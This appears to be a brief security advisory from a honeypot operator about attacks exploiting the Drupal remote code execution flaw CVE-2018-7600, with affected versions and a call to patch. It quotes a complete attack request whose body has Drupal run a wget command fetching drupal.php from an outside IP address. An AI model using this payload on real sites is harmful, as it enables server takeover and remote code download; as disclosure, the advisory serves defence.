Widespread Drupal Arbitrary Code Execution

Date of Detection:

2018.3.29

 

Attack Pattern:

  • URI:

/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

 

  • Request Body:

form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&

mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php

 

Target System:

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.

 

Analysis:

This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and attacking a large portion of worldwide honeypots of CloudCoffer. That means if any system is not updated, it is in a dangerous situation.

Please note that the payload carried from the request bodies are different from requests to requests.